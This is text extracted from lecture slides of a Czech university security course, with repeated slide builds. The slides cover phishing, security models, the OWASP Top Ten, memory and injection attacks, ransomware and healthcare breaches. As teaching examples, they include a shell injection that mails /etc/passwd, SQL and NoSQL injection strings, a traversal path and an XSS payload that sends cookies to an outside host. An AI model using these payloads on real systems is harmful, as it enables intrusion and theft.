security in computer systems - cvut.cz · security in computer systems miroslav burša1 1beat...

Security in Computer Systems

Miroslav Burša1

1BEAT Research GroupCIIRC CTU in Prague

Czech Technical University in Prague

20. brezna 2017

ÚvodModely

Základní útokySecure systems

Záver

PrehledMotivace

Prehled I

ÚvodPrehledMotivace

ModelyPrehledCIA TriadTypy rízeníRízení prístupuRisk management

Základní útokyÚvodOWASP Top Ten

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Prehled IIOWASP Top Ten MobilePrehledPricingVulnerable Medical Devices

Secure systemsPrehled technologiíZásadyPrevenceTesty

ZáverZ domovaObecné

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Prehled IIIDiskuze

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

CNN?

Obrázek: Have you seen it...?

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

03/2017: Phishing

Obrázek: Address line

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Phishing

Obrázek: Image 1

Obrázek:Image 2

Easy: 2pics, 1 form,javascript

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Phishing

Obrázek: Source code

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Phishing

Obrázek: Next step

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Phishing

Obrázek: Next step: Detail

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Phishing

Obrázek: And we’re back...M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Nigerian Scam (March 2017)

Obrázek: Free money...?

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

IT Helpdesk (March 2017)

Obrázek: Phishing, social engineeringM. Burša Security

ÚvodModely


Záver

PrehledMotivace


Obrázek: Secure...?

M. Burša Security

ÚvodModely


Záver

PrehledMotivace


Obrázek: admin Office Help-Desk

M. Burša Security

ÚvodModely


Záver

PrehledMotivace


I Display: http://mkrspc.se/9DI Link: http://www.google.com/url?q=http%3A%2F%2Fmkrspc.se%2F9D&sa=D&sntz=1&usg=AFQjCNGLa70cIgORZk-w-Qv7RpNCB1S4EgThe link redirects automatically... Guess why this approachhas been used...

M. Burša Security

http://mkrspc.se/9D

http://www.google.com/url?q=http%3A%2F%2Fmkrspc.se%2F9D&sa=D&sntz=1&usg=AFQjCNGLa70cIgORZk-w-Qv7RpNCB1S4Eg



ÚvodModely


Záver

PrehledMotivace


Obrázek: Password displayed in cleartextM. Burša Security

ÚvodModely


Záver

PrehledMotivace


Obrázek: Even for unmatch. pwds, even for blank form...M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Skimming device

Obrázek: Find a difference

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

An average day...

Obrázek: Motivacní obrázek, Checkpoint Security Report 2016

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

An average day...

Obrázek:Avg. day

I Every 4 s: An unknown malware is downloadedI Every 5 s: A host accesses a malicious websiteI Every 30 s: A threat emulation event occursI Every 53 s: A bot communicates with its CC centerI Every 81 s: A known malware is downloadedI Every 4 min: A high-risk app is usedI Every 32 min: Sensitive data is sent outside the org.

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Bezpecnost

Obrázek: Motivacní obrázekM. Burša Security

ÚvodModely


Záver

PrehledMotivace

Bezpecnost

“The riskiest thing we can dois just maintain the status quo”

-Bob Iger, buisinessman, chairman/CEO of Walt Disney Company

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Bezpecnost

“Status quo, you know,is Latin for ’the mess we’re in’.”

-Ronald Reagan, actor and former President of the United States

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Bezpecnost

“There is no such thing as perfect security,only varying levels of insecurity.”

-Salman Rushdie, author

M. Burša Security

ÚvodModely


Záver

PrehledMotivace

Where are you?

Obrázek: I must be somewhere...

M. Burša Security

ÚvodModely


Záver

PrehledCIA TriadTypy rízeníRízení prístupuRisk management

Modely pocítacové bezpecnosti

I Access control list (ACL)I Capability-based securityI Multi-level security (MLS)I Role-based access control (RBAC)I Lattice-based access control (LBAC)I Bell-LaPadula modelI Biba modelI Clark-Wilson modelI Graham-Denning modelI Take-grant protection modelI Object-capability modelI . . .

M. Burša Security

ÚvodModely


Záver


CIA Triad

Obrázek: AIC: The CIA triad

Model designed to guide policies for information security withinan organization.

M. Burša Security

ÚvodModely


Záver


CIA Triad

Obrázek:The CIAtriad

I Confidentiality (privacy)I Citlivé údaje: pouze autorizovani lidéI Porušení: Koukání pres rameno

I IntegrityI Bez autorizace nelze data vytvorit/zmenit/smazat.

Zachovat duveryhodnost a konzistenci.I Porušení: Napr. výpadek el. proudu

I AvailabilityI Dostupnost informací, pocítacových systému

zpracovávajících tyto informace a bezpecnostníchprvku chránící tyto informace (redundance (RAID),failover, HA, DRPa)

aData Recovery Plan

M. Burša Security

ÚvodModely


Záver


CIA Triad

Obrázek:The CIAtriad

I Confidentiality (privacy)I Citlivé údaje: pouze autorizovani lidéI Porušení: Koukání pres rameno

I IntegrityI Bez autorizace nelze data vytvorit/zmenit/smazat.

Zachovat duveryhodnost a konzistenci.I Porušení: Napr. výpadek el. proudu

I AvailabilityI Dostupnost informací, pocítacových systému

zpracovávajících tyto informace a bezpecnostníchprvku chránící tyto informace (redundance (RAID),failover, HA, DRPa)

aData Recovery PlanM. Burša Security

ÚvodModely


Záver


Typy rízení

I AdministrativníI psaná pravidla: zásady, postupy, návody, standardy

I LogickéI monitorování a rízení prístupu k informacím (hesla,

firewally, IDS, ACL, ...)I Principle of least privilege (Windows Administrator ,) vs.

BYOD, BYOAI Fyzické

I monitorování a rízení v rámci pracovišt’ a pocítacovýchstredisek (zámky, dvere, alarmy, kamery, hlídaci, ...)

I Separation of duties

M. Burša Security

ÚvodModely


Záver


Typy rízení




BYOD, BYOA

I FyzickéI monitorování a rízení v rámci pracovišt’ a pocítacových

stredisek (zámky, dvere, alarmy, kamery, hlídaci, ...)I Separation of duties

M. Burša Security

ÚvodModely


Záver


Typy rízení




BYOD, BYOAI Fyzické

I monitorování a rízení v rámci pracovišt’ a pocítacovýchstredisek (zámky, dvere, alarmy, kamery, hlídaci, ...)

I Separation of duties

M. Burša Security

ÚvodModely


Záver


Klasifikace informací

I Ochrana v závislosti na hodnote informacíI Závisí na oblasti použitíI Nutno kvantifikovat význam klasifikaceI Nutno školit zamestnance i partnery

Príklad:I Obchodní sféra:

I public/sensitive/private/confidentialI Vládní sféra:

I unclassified, sensitive but unclassified, confidential, secret,top secret

M. Burša Security

ÚvodModely


Záver


Rízení prístupu

Informace smí být prístupné pouze povereným osobámI Identifikace – "Hello, my name is John Doe"(username)

I Autentizace – Overení, že osoba je opravdu John Doe(heslo)

I something you knowI something you haveI something you are

I Autorizace oprávnení k prístupu k informacím (roleuživatele, RADIUS, Kerberos, . . . )

I Protokolování Auditing; záznamy nesmí být možnémodifikovat

M. Burša Security

ÚvodModely


Záver


Rízení prístupu

Informace smí být prístupné pouze povereným osobámI Identifikace – "Hello, my name is John Doe"(username)I Autentizace – Overení, že osoba je opravdu John Doe

(heslo)I something you knowI something you haveI something you are

I Autorizace oprávnení k prístupu k informacím (roleuživatele, RADIUS, Kerberos, . . . )

I Protokolování Auditing; záznamy nesmí být možnémodifikovat

M. Burša Security

ÚvodModely


Záver


Rízení prístupu

The strength of any system is no greater than its weakest link.

Obrázek: Access ControlM. Burša Security

ÚvodModely


Záver


Risk management

I Risk: riziko – pravdepodobnost, že dojde k záškodné akci

I Vulnerability: zranitelnost, využitelná k ohrožení cizpusobení škody

I Threat: hrozba, která má možnost zpusobit škodu

I Není možné eliminovat veškerá rizika: Residual risk

M. Burša Security

ÚvodModely


Záver


Risk management

I Risk: riziko – pravdepodobnost, že dojde k záškodné akciI Vulnerability: zranitelnost, využitelná k ohrožení ci

zpusobení škody

I Threat: hrozba, která má možnost zpusobit škodu


M. Burša Security

ÚvodModely


Záver


Risk management


zpusobení škodyI Threat: hrozba, která má možnost zpusobit škodu


M. Burša Security

ÚvodModely


Záver


Think twice before you act

M. Burša Security

ÚvodModely


Záver


Risk management


zpusobení škodyI Threat: hrozba, která má možnost zpusobit škodu

I Není možné eliminovat veškerá rizika: Residual riskI Disaster recovery planning

M. Burša Security

ÚvodModely


Záver


Bezpecnostní rizika – príklad

Obrázek: Bezpecnostní rizika (e-shop)

M. Burša Security

ÚvodModely


Záver

OWASP Top TenOWASP Top Ten MobilePrehledPricingVulnerable Medical Devices

OWASP Top 10 Risks

The OWASP Top 10 Web Application Security Risks for 2013:A1 InjectionA2 Broken Authentication and Session ManagementA3 Cross-Site Scripting (XSS)A4 Insecure Direct Object ReferencesA5 Security MisconfigurationA6 Sensitive Data ExposureA7 Missing Function Level AccessA8 Cross-Site Request Forgery (CSRF)A9 Using Known Vulnerable Components

A10 Unvalidated Redirects and Forwards

Zdroj: owasp.org

M. Burša Security

ÚvodModely


Záver


A1 – Injection

Injection flaws, such as SQL, OS, and LDAP injection occurwhen untrusted data is sent to an interpreter as part of acommand or query.The attacker’s hostile data can trick the interpreter intoexecuting unintended commands or accessing data withoutproper authorization.

Zdroj: owasp.org

M. Burša Security

ÚvodModely


Záver


A2 – Broken Authentication and Session Management

Application functions related to authentication and sessionmanagement are often not implemented correctly, allowingattackers to compromise passwords, keys, or session tokens,or to exploit other implementation flaws to assume other users’identities.

Zdroj: owasp.org

M. Burša Security

ÚvodModely


Záver


A3 – Cross-Site Scripting (XSS)

XSS flaws occur whenever an application takes untrusted dataand sends it to a web browser without proper validation orescaping.XSS allows attackers to execute scripts in the victim’s browserwhich can hijack user sessions, deface web sites, or redirectthe user to malicious sites.

Zdroj: owasp.org

M. Burša Security

ÚvodModely


Záver


A4 – Insecure Direct Object References

A direct object reference occurs when a developer exposes areference to an internal implementation object, such as a file,directory, or database key. Without an access control check orother protection, attackers can manipulate these references toaccess unauthorized data.

Zdroj: owasp.org

M. Burša Security

ÚvodModely


Záver


A5 – Security Misconfiguration

Good security requires having a secure configuration definedand deployed for the application, frameworks, applicationserver, web server, database server, and platform.Secure settings should be defined, implemented, andmaintained, as defaults are often insecure. Additionally,software should be kept up to date.

Zdroj: owasp.org

M. Burša Security

ÚvodModely


Záver


A6 – Sensitive Data Exposure

Many web applications do not properly protect sensitive data,such as credit cards, tax IDs, and authentication credentials.Attackers may steal or modify such weakly protected data toconduct credit card fraud, identity theft, or other crimes.Sensitive data deserves extra protection such as encryption atrest or in transit, as well as special precautions whenexchanged with the browser.

Zdroj: owasp.org

M. Burša Security

ÚvodModely


Záver


A7 – Missing Function Level Access

Most web applications verify function level access rights beforemaking that functionality visible in the UI. However, applicationsneed to perform the same access control checks on the serverwhen each function is accessed.If requests are not verified, attackers will be able to forgerequests in order to access functionality without properauthorization.

Zdroj: owasp.org

M. Burša Security

ÚvodModely


Záver


A8 – Cross-Site Request Forgery (CSRF)

A CSRF attack forces a logged-on victim’s browser to send aforged HTTP request, including the victim’s session cookie andany other automatically included authentication information, toa vulnerable web application.This allows the attacker to force the victim’s browser togenerate requests the vulnerable application thinks arelegitimate requests from the victim.

Zdroj: owasp.org

M. Burša Security

ÚvodModely


Záver


A9 – Using Known Vulnerable Components

Components, such as libraries, frameworks, and other softwaremodules, almost always run with full privileges. If a vulnerablecomponent is exploited, such an attack can facilitate seriousdata loss or server takeover.Applications using components with known vulnerabilities mayundermine application defenses and enable a range of possibleattacks and impacts.

Zdroj: owasp.org

M. Burša Security

ÚvodModely


Záver


A10 – Unvalidated Redirects and Forwards

Web applications frequently redirect and forward users to otherpages and websites, and use untrusted data to determine thedestination pages.Without proper validation, attackers can redirect victims tophishing or malware sites, or use forwards to accessunauthorized pages.

Zdroj: owasp.org

M. Burša Security

ÚvodModely


Záver


OWASP Top 10 Mobile Risks

The OWASP Top 10 Mobile Security Risks, 2014, v1.0:A1 Weak Server Side ControlsA2 Insecure Data StorageA3 Insufficient Transport Layer ProtectionA4 Unintended Data LeakageA5 Poor Authorization and AuthenticationA6 Broken CryptographyA7 Client Side InjectionA8 Security Decisions Via Untrusted InputsA9 Improper Session Handling

A10 Lack of Binary Protections

Zdroj: owasp.org

M. Burša Security

ÚvodModely


Záver


Základní útoky

I Stack overflow (Pretecení zásobníku)

Obrázek: Zdroj: http://usenix.org/.../sec98/.../cowan

M. Burša Security

ÚvodModely


Záver


Základní útoky: Buffer overrun

Obrázek: Zdroj: http://faculty.cs.tamu.edu/bettati/Courses/410/2006A/..._overview.htmlM. Burša Security

ÚvodModely


Záver


Základní útoky

I Stack overflow (Pretecení zásobníku)

I Stack smashing (Canaries: Terminator, Random, RandomXOR)

I Return-to-libc-attackI Snaží se o provedení tzv. ShellCode

I Ochrana pameti: W∧X (OpenBSD), NX (Windows)I Heap overflowI Integer overflow/underflow

M. Burša Security

ÚvodModely


Záver


Základní útoky

I Stack overflow (Pretecení zásobníku)I Stack smashing (Canaries: Terminator, Random, Random

XOR)

I Return-to-libc-attackI Snaží se o provedení tzv. ShellCode


M. Burša Security

ÚvodModely


Záver


Základní útoky


XOR)I Return-to-libc-attack

I Snaží se o provedení tzv. ShellCodeI Ochrana pameti: W∧X (OpenBSD), NX (Windows)I Heap overflowI Integer overflow/underflow

M. Burša Security

ÚvodModely


Záver


Základní útoky


XOR)I Return-to-libc-attackI Snaží se o provedení tzv. ShellCode


M. Burša Security

ÚvodModely


Záver


Základní útoky



I Ochrana pameti: W∧X (OpenBSD), NX (Windows)

I Heap overflowI Integer overflow/underflow

M. Burša Security

ÚvodModely


Záver


Základní útoky



I Ochrana pameti: W∧X (OpenBSD), NX (Windows)I Heap overflow

I Integer overflow/underflow

M. Burša Security

ÚvodModely


Záver


Základní útoky




M. Burša Security

ÚvodModely


Záver


Integer over/underflow

Obrázek: Zdroj:Wikipedia

I i.e.: ./read_n_bytes ’6’ ’abcd’,what if we use ’-1’...?

I 30 April 2015, the FAAa announced it will order Boeing787 operators to reset its electrical system periodically,to avoid an integer overflow which could lead to loss ofelectrical power and ram air turbine deployment,and Boeing is going to deploy a software update in thefourth quarter.The EASAb followed on 4 May 2015.The error happens after 231 centiseconds(248.55134814815 days), indicating a 32-bit signedinteger.

aFederal Aviation AuthoritybEuropean Aviation Safety Agency

M. Burša Security

ÚvodModely


Záver


Základní útoky



I Ochrana pameti: W∧X (OpenBSD), NX (Windows)I Heap overflowI Integer overflow/underflowI Directory traversal

I ../../../../../../../../../etc/passwd

I DoS, DDoS1, Slow Loris

1IoUT, IoSTM. Burša Security

ÚvodModely


Záver


Základní útoky



I Ochrana pameti: W∧X (OpenBSD), NX (Windows)I Heap overflowI Integer overflow/underflowI Directory traversal

I ../../../../../../../../../etc/passwd

I DoS, DDoS1, Slow Loris1IoUT, IoST

M. Burša Security

ÚvodModely


Záver


DoS recovery

Obrázek: Zdroj: pinterest.com/itpie/it-jokes/

M. Burša Security

ÚvodModely


Záver


Základní útoky

I Buffer overflow (Pretecení zásobníku)I Stack smashing (Canaries: Terminator, Random, Random


I Ochrana pameti: W∧X (OpenBSD), NX (Windows)I Heap overflowI Integer overflowI Directory traversal

I ../../../../../../../../../etc/passwd

I DoS, DDoS, Slow Loris

M. Burša Security

ÚvodModely


Záver


Základní útoky

I Format string attackI printf("%s", buf), printf("%s")

I Permissions hackingI Race conditions

I Spirit RoverI TOCTTOU

M. Burša Security

ÚvodModely


Záver


Základní útoky


I Permissions hacking

I Race conditionsI Spirit RoverI TOCTTOU

M. Burša Security

ÚvodModely


Záver


Základní útoky

Príklad:

Obrázek: XOR Racecondition




M. Burša Security

ÚvodModely


Záver


Základní útoky

Príklad:

Obrázek: Spirit Rover(filesystem full)



I Spirit Rover

I TOCTTOU

M. Burša Security

ÚvodModely


Záver


Základní útoky




M. Burša Security

ÚvodModely


Záver


TOCTTOU

I Time-of-check-to-time-of-useI race conditions

if (access(file, R_OK) != 0) {exit(1);

}

fd = open(file, O_RDONLY);// do something with the file descriptor fd...

M. Burša Security

ÚvodModely


Záver


TOCTTOU

I Time-of-check-to-time-of-useI race conditions

if (access(file, R_OK) != 0) {exit(1);

}

***

fd = open(file, O_RDONLY);// do something with the file descriptor fd...

M. Burša Security

ÚvodModely


Záver


A human trap

Social hacking


M. Burša Security

ÚvodModely


Záver


Code injection: Shell

U jazyku, nevyžadujících striktní použití typuI Vkládání škodlivého kóduI Vkládání celých príkazu

I Príklad: GuestbookI ; cat /etc/passwd | [email protected]

M. Burša Security

ÚvodModely


Záver


Code injection: PHP

$myvar = "varname";$x = $_GET[’arg’];eval("\$myvar = \$x;");

Argument:

"10 ; system(\"/bin/echo uh-oh\");"

M. Burša Security

ÚvodModely


Záver


Code injection: PHP

if ( isset( $_GET[’COLOR’] ) )$color = $_GET[’COLOR’];

require( $color . ’.php’ );

M. Burša Security

ÚvodModely


Záver


Code injection: SQL

"SELECT * FROM users WHEREname = ’ " + userName + " ’;"

a’ or ’t’=’t

SELECT * FROM users WHEREname = ’a’ or ’t’=’t’;

I (zneužití: overení uživatele vždy projde)

M. Burša Security

ÚvodModely


Záver


Code injection: SQL

"SELECT * FROM users WHEREname = ’ " + userName + " ’;"

a’;DROP TABLE users; SELECT * FROMdata WHERE name LIKE ’%

SELECT * FROM users WHEREname = ’a’;DROP TABLE users; SELECT * FROMdata WHERE name LIKE ’%’;

M. Burša Security

ÚvodModely


Záver


Code injection: SQL

"SELECT * FROM data WHEREid = " + a_variable + ";"

1;DROP TABLE users

SELECT * FROM dataWHERE id = 1;DROP TABLE users;

I (ochrana: silná kontrola typu)

M. Burša Security

ÚvodModely


Záver


Code injection: SQL

Obrázek: Zdroj: xkcd.com

M. Burša Security

ÚvodModely


Záver


Obrana proti SQL Injection

I Prepared Statement, Odstranení literálu

M. Burša Security

ÚvodModely


Záver


Odstranení literálu

Pred odstranením

SELECT * FROM USER WHERE NAME=’Smith’SELECT * FROM ITEMS WHERE USERID=2

Po odstranení

SELECT * FROM USER WHERE NAME=?SELECT * FROM ITEMS WHERE USERID=?

M. Burša Security

ÚvodModely


Záver



I Prepared Statement, Odstranení literáluI Oprávnení (GRANT/REVOKE, uživatelské role)I Uložené procedury (kontrola typu)

M. Burša Security

ÚvodModely


Záver


Stored procedures

Máme dve uložené procedury

GET_PASSWORD(userName)GET_USER(userName, password)

Lze zneužít:

GET_USER(’admin’,’’ || GET_PASSWORD(’admin’) || ’’)

M. Burša Security

ÚvodModely


Záver


Code injection: NoSQL MongoDB/Node.js

Simple app:

query.title = ...; query.type = ...if (query.type != ’secret’) {return Document.find(query.exec().json()

} else return json([])

Example usage:

{"type" : "blog"} -> blogs: OK{"type" : "secret"} -> empty array: OK

Injection:

{ "type": { "$gte": "" } } -> All documents: Err!

blog.sqreen.io/mongodb-will-not-prevent-nosql-injections-in-your-node-js-app

M. Burša Security


ÚvodModely


Záver


Code injection: NoSQL MongoDB/Node.js

query.title = ...; query.type = ...if (query.type != ’secret’) {return Document.find(query.exec().json()

} else return json([])

Example usage:

{"type" : "blog"} -> blogs: OK{"type" : "secret"} -> empty array: OK

Injection:

{ "type": { "$gte": "" } } -> All documents: Err!


M. Burša Security


ÚvodModely


Záver



I Prepared Statement, Odstranení literálu

M. Burša Security

ÚvodModely


Záver


Cross-Site Scripting (XSS)

http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

M. Burša Security

ÚvodModely


Záver


Cross-Site Scripting (XSS)

http://host/a.php?variable="><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?’%20+document.cookie</script>

M. Burša Security

ÚvodModely


Záver


Web-based attacks

I XSS (Cross-site scripting)I Cookies (session hijack), sniffingI Confused-deputy, napr.: CSRF2

I SSL stripping (HSTS3, HPKP4)I Clickjacking (UI Redress), TabNabbing, Silent link

replacement, Custom Find (Ctrl+F) event, ...

2Cross-site request forgery3HTTP Strict Transfer Security4HTTP Public Key Pinning

M. Burša Security

ÚvodModely


Záver


Web-based attacks


I SSL stripping (HSTS3, HPKP4)

I Clickjacking (UI Redress), TabNabbing, Silent linkreplacement, Custom Find (Ctrl+F) event, ...


M. Burša Security

ÚvodModely


Záver


Web-based attacks


I SSL stripping (HSTS3, HPKP4)I Clickjacking (UI Redress), TabNabbing, Silent link

replacement, Custom Find (Ctrl+F) event, ...


M. Burša Security

ÚvodModely


Záver


Other / Nomenclature

I Evil maid attack, cold boot attack

I Scareware, Rogueware, Malware, Adware, Spyware,Dialer, Keylogger, Phishing attacks (Spear phishing,Waterhole attacks), ...

I Ransomware, ...

M. Burša Security

ÚvodModely


Záver



I Evil maid attack, cold boot attackI Scareware, Rogueware, Malware, Adware, Spyware,

Dialer, Keylogger, Phishing attacks (Spear phishing,Waterhole attacks), ...

I Ransomware, ...

M. Burša Security

ÚvodModely


Záver


Ransomware (2016, 1 BTC)

Obrázek: Ransomware example

Obrázek: Save with MLM ;)

M. Burša Security

ÚvodModely


Záver


Ransomware PopcornTime (2016, 1 BTC)

Obrázek: Save with MLM ;)

M. Burša Security

ÚvodModely


Záver


Ransomware

Studie Q3 2016 Malware Review spolecnosti PhishMeuvádí následující hlavní trendy phishingových e-mailu:97 % z nich je spojeno s nejakou formou distribuceransomwaru, pouze 3 % distribuují zcela jiný malware– predevším ruzné formy “tiché” infekce urcené ktomu, aby v organizacích mohly nepozorovanefungovat co nejdelší dobu a sbírat data.

M. Burša Security

ÚvodModely


Záver





I Ransomware, CaaS (Crimeware as a S.)

I Side channel attacks, timing attacksI MITM attacks, SSL StrippingI ROP, emulation detectionI Botnets, DGA5

5Domain Generation Algorithm; sometimes FastFlux (300s record change)M. Burša Security

ÚvodModely


Záver





I Ransomware, CaaS (Crimeware as a S.)I Side channel attacks, timing attacks

I MITM attacks, SSL StrippingI ROP, emulation detectionI Botnets, DGA5


ÚvodModely


Záver





I Ransomware, CaaS (Crimeware as a S.)I Side channel attacks, timing attacksI MITM attacks, SSL Stripping

I ROP, emulation detectionI Botnets, DGA5


ÚvodModely


Záver





I Ransomware, CaaS (Crimeware as a S.)I Side channel attacks, timing attacksI MITM attacks, SSL StrippingI ROP, emulation detection

I Botnets, DGA5


ÚvodModely


Záver





I Ransomware, CaaS (Crimeware as a S.)I Side channel attacks, timing attacksI MITM attacks, SSL StrippingI ROP, emulation detectionI Botnets, DGA5


ÚvodModely


Záver


2015 attack vectors for malware

I .exe files: 30 %I .zip, .jar: more than 16 %I MSOffice: 9 %, PDF: 7.5 %I trend: trusted files: PDF, Flash, MSOffice

I Antivirus: Signature based: Creating unknown malware iseasier than ever.

I With nearly 12 million new malware variants beingdiscovered every month, more new malware has beendiscovered in the past two years than in the previous 29years combined6

6in Checkpoint Security Report, 2016M. Burša Security

ÚvodModely


Záver


Trends...?

Obrázek: Zdroj: Checkpoint Security Report 2015M. Burša Security

ÚvodModely


Záver


Trends in Android Malware

Obrázek: Zdroj:Checkpoint SecurityReport 2015

I Obfuscation

I Evasiontechniques

I DroppersI RedundancyI PersistencyI Privilege

escalation

M. Burša Security

ÚvodModely


Záver




I ObfuscationI Evasion

techniques

I DroppersI RedundancyI PersistencyI Privilege

escalation

M. Burša Security

ÚvodModely


Záver





techniquesI Droppers

I RedundancyI PersistencyI Privilege

escalation

M. Burša Security

ÚvodModely


Záver





techniquesI DroppersI Redundancy

I PersistencyI Privilege

escalation

M. Burša Security

ÚvodModely


Záver





techniquesI DroppersI RedundancyI Persistency

I Privilegeescalation

M. Burša Security

ÚvodModely


Záver





techniquesI DroppersI RedundancyI PersistencyI Privilege

escalation

M. Burša Security

ÚvodModely


Záver


Android Malware: Trends and Vulnerabilitieschallenges

I System Vulnerabilities: Over 24.000 types, securitypatches delays

I Root Access nad Configuration Changes: Rooting,jailbreaking also for cybercriminals.

I Repackaged or fake appsI Trojans and Malware: Embedded in apps, lack of threat

prevention, small screens = spotting differencies problemsI MITM attacks: Free and public WiFi hotspots

M. Burša Security

ÚvodModely


Záver





I Repackaged or fake apps

I Trojans and Malware: Embedded in apps, lack of threatprevention, small screens = spotting differencies problems

I MITM attacks: Free and public WiFi hotspots

M. Burša Security

ÚvodModely


Záver






prevention, small screens = spotting differencies problems

I MITM attacks: Free and public WiFi hotspots

M. Burša Security

ÚvodModely


Záver






prevention, small screens = spotting differencies problemsI MITM attacks: Free and public WiFi hotspots

M. Burša Security

ÚvodModely


Záver


Healthcare

I Patient health records: highest value on the black market:10× more than CC; CC can be reissued easily, PHR not7

I 60% inrease in healthcare security incidentsI 21 % of U.S. healthcare organization do not use disaster

recovery technology, 51.7 % of these intend to purchase inthe future

I 19 % of U.S. healthcare organizations report having asecurity breach in the last year

I The top 3 perceived threat motivators in the US:

I 80 % workers snooping on relatives/friendsI 66 % concerned with financial identity theftI 51 % identity theft

7in Checkpoint Security Report 2016M. Burša Security

ÚvodModely


Záver


Healthcare


I 60% inrease in healthcare security incidents

I 21 % of U.S. healthcare organization do not use disasterrecovery technology, 51.7 % of these intend to purchase inthe future





ÚvodModely


Záver


Healthcare








ÚvodModely


Záver


Healthcare





I The top 3 perceived threat motivators in the US:I 80 % workers snooping on relatives/friends

I 66 % concerned with financial identity theftI 51 % identity theft


ÚvodModely


Záver


Healthcare





I The top 3 perceived threat motivators in the US:I 80 % workers snooping on relatives/friendsI 66 % concerned with financial identity theft

I 51 % identity theft


ÚvodModely


Záver


Healthcare





I The top 3 perceived threat motivators in the US:I 80 % workers snooping on relatives/friendsI 66 % concerned with financial identity theftI 51 % identity theft


ÚvodModely


Záver


Major Health Care Data Cyber Attacks

Source: TrapX Security, Inc., 2016M. Burša Security

ÚvodModely


Záver


Top 10 HealthCare Cyber Attacks of 2016

Company Impact.indiv. ReportedBanner Health 3.620.000 Aug., 3Newkirk Products 3.446.120 Aug., 921st Century Oncology 2.213.597 March, 4Valley Anesthesiology Consultants, Inc. 882.590 Aug, 12Peachtree Orthopaedic Clinic 531.000 Nov, 18Central Ohio Urology Group, Inc. 300.000 May, 5Southeast Eye Institute P.A. 87.314 May, 5Medical Colleagues of Texas, LLP 68.631 May, 11Urgent Care Clinic of Oxford 64.000 Sept., 30Alliance Health Networks, LLC 42.372 Feb, 152016 TrapX Security, Inc.

M. Burša Security

ÚvodModely


Záver



#1 Banner Health, 3.620.000Attack started on systems that process CC for food & bever.Then moved laterally to compromise patient health carerecords on other servers.

#2 Newkirk Products, 3.446.120Cyber attacker gained access to a server containing importanthealth-plan info.

#3 21st Century Oncology, 2.213.597Cyberattack on company’s database.

M. Burša Security

ÚvodModely


Záver



#4 Valley Anesthesiology Consultants, Inc., 882.590Attackers gained access to server containing e. PHI8

#5 Peachtree Orthopaedic Clinic, 531.000Patient database breach.

#6 Central Ohio Urology Group, Inc., 300.000Unauthorized person posted online files and documents frominternal fileserver.

8Personal Health InfoM. Burša Security

ÚvodModely


Záver



#7 Southeast Eye Institute P.A., 87.314Associated business partner: Data breach.

#8 Medical Colleagues of Texas, LLP, 68.631External entity entered computer network.

#9 Urgent Care Clinic of Oxford, 64.000Ransomware attack. Urgent care staff noted that the serverwas running slowly.

#10 Alliance Health Networks, LLC, 42.372Patient database accessible via the Internet. Databaseconfiguration error (MongoDB).

M. Burša Security

ÚvodModely


Záver


HW Attacks: x86 architecture

I Can TPM9 be really trusted? C. Bowden: Anything that is“trusted” is a potentially lethal enemy of any secure system

I Can the (firmware of) BIOS/UEFI and the SMM10,GPU/NIC/SATA/HDD/EC11 be trusted...?

I BIOS/UEFI loads as the first code→ can affect thefollowing images loaded

I The peripherals: HW, Firmware and OS drivers and stack:Outside of TCB12

J. Rutkowska, Intel x86 considered harmful, Oct. 2015

9Trusted/Trusted(?) Platform Module

10System Management Mode: LightEater rootkit, PoC

11Embedded Controller

12Trusted Computing Base

M. Burša Security

ÚvodModely


Záver



I Can TPM9 be really trusted? C. Bowden: Anything that is“trusted” is a potentially lethal enemy of any secure system

I Can the (firmware of) BIOS/UEFI and the SMM10,GPU/NIC/SATA/HDD/EC11 be trusted...?

I BIOS/UEFI loads as the first code→ can affect thefollowing images loaded

I The peripherals: HW, Firmware and OS drivers and stack:Outside of TCB12


Trusted/Trusted(?) Platform Module10

System Management Mode: LightEater rootkit, PoC11

Embedded Controller12

Trusted Computing Base

M. Burša Security

ÚvodModely


Záver


HW Attacks: x86 architecture: Secure(?) BIOS/UEFI

How can BIOS become malicious?I Backdoored (malicious) by vendor

I Somebody able to later modify the BIOS – lackingreflashing protection, exploiting flaws in BIOS andreflashing before SMM13 locks are applied

I SPI programming interface (physical attack)J. Rutkowska, Intel x86 considered harmful, Oct. 2015

13System Management Mode

M. Burša Security

ÚvodModely


Záver


HW Attacks: x86 architecture: Secure(?) BIOS/UEFI

How can BIOS become malicious?I Backdoored (malicious) by vendorI Somebody able to later modify the BIOS – lacking

reflashing protection, exploiting flaws in BIOS andreflashing before SMM13 locks are applied

I SPI programming interface (physical attack)J. Rutkowska, Intel x86 considered harmful, Oct. 2015

13System Management Mode

M. Burša Security

ÚvodModely


Záver



TPM problemsI Maintaining a long chain of trust

I Need to anchor the chain at some trusted piece of code,somewhere at the very beginning of the platform life cycle(CRTM, Core Root of Trust for Measurement)

I This must be ROMI ...but is implemented within BIOS (SPI flash memory)


M. Burša Security

ÚvodModely


Záver



TPM problemsI Maintaining a long chain of trustI Need to anchor the chain at some trusted piece of code,

somewhere at the very beginning of the platform life cycle(CRTM, Core Root of Trust for Measurement)



M. Burša Security

ÚvodModely


Záver





I This must be ROM

